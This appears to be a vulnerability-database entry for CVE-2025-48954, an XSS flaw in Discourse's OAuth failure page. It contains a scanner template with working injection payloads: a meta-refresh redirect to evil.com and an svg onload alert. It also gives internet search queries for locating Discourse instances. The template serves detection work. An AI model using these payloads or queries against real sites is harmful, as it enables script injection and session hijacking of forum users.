| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-48954 | 25 Jun 202514:51 | – | circl | |
| Discourse 跨站脚本漏洞 | 25 Jun 202500:00 | – | cnnvd | |
| CVE-2025-48954 | 25 Jun 202514:02 | – | cve | |
| CVE-2025-48954 Discourse vulnerable to XSS via user-provided query parameter in oauth failure flow | 25 Jun 202514:02 | – | cvelist | |
| EUVD-2025-28274 | 25 Jun 202514:02 | – | euvd | |
| CVE-2025-48954 | 25 Jun 202514:15 | – | nvd | |
| Discourse 3.5.x < 3.5.0.beta6 XSS Vulnerability | 26 Jun 202500:00 | – | openvas | |
| BIT-DISCOURSE-2025-48954 Discourse vulnerable to XSS via user-provided query parameter in oauth failure flow | 1 Jul 202517:44 | – | osv | |
| CVE-2025-48954 Discourse vulnerable to XSS via user-provided query parameter in oauth failure flow | 25 Jun 202514:02 | – | osv | |
| PT-2025-26829 · Discourse · Discourse | 25 Jun 202500:00 | – | ptsecurity |
id: CVE-2025-48954
info:
name: Discourse OAuth Social Login - Cross-site Scripting
author: ferreiraklet,DhiyaneshDK,pdresearch
severity: high
description: |
Discourse versions prior to 3.5.0.beta6 contain a stored Cross-Site Scripting (XSS) vulnerability in the OAuth/social login functionality. The vulnerability is caused by lack of proper content security policy enforcement when processing social login failures,allowing remote attackers to inject and execute malicious scripts in users' browsers.
impact: |
Attackers can inject malicious scripts through the provider parameter in OAuth login failures, executing JavaScript in victim browsers and potentially achieving session hijacking.
remediation: Update the discourse to version 3.5.0.beta6 or later.
reference:
- https://github.com/discourse/discourse/security/advisories/GHSA-26p5-mjjh-wfcf
- https://nvd.nist.gov/vuln/detail/CVE-2025-48954
classification:
cve-id: CVE-2025-48954
cwe-id: CWE-79
epss-score: 0.0063
epss-percentile: 0.45832
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
cvss-score: 8.1
cpe: cpe:2.3:a:discourse:discourse:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
shodan-query: http.component:"Discourse"
fofa-query: app="Discourse"
zoomeye-query: app:"Discourse"
hunter-query: web.title="Discourse"
tags: cve,cve2025,discourse,xss,oauth,vuln
variables:
# XSS payloads for different exploitation scenarios
redirect_payload: "%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttps%3A//evil.com%22%3E"
basic_xss: "<svg/onload=alert('XSS-CVE-2025-48954')>"
http:
- method: GET
path:
# Test 1: Open redirect via meta refresh injection
- '{{BaseURL}}/auth/failure?provider={{redirect_payload}}'
# Test 2: Basic XSS payload injection
- '{{BaseURL}}/auth/failure?provider={{basic_xss}}'
matchers:
- type: dsl
name: open-redirect-meta-refresh
dsl:
- 'contains(body, "<meta http-equiv=\"refresh\" content=\"0;url=https://evil.com\">")'
- 'contains(to_lower(body), "discourse")'
- 'status_code == 200'
condition: and
- type: dsl
name: basic-xss-execution
dsl:
- 'contains(body, "onload=alert(")'
- 'contains(body, "XSS-CVE-2025-48954")'
- 'contains(to_lower(body), "discourse")'
- 'status_code == 200'
- '!contains(to_lower(header), "content-security-policy")'
condition: and
extractors:
- type: regex
name: discourse_version
group: 1
regex:
- '<meta name="generator" content="Discourse ([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
- "(?i)discourse['\"]?\\s*:\\s*['\"]?([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
- "(?i)x-discourse-version:\\s*([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
- '"version"\\s*:\\s*"([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"'
- '<!-- Discourse ([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
- '/assets/discourse-([0-9]+\.[0-9]+\.[0-9]+(?:\.beta[0-9]+)?)'
- "(?i)discourse[^\"']*?([0-9]+\\.[0-9]+\\.[0-9]+(?:\\.beta[0-9]+)?)"
# digest: 4b0a00483046022100f9fe72e0269c1f17a8947438df237c32775e4cc232c054409801246d98a35ef2022100c2df92b6cc4d7c0c74ceaa39ce498a61ff218a6179a570d6abc26aff2cab5460:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation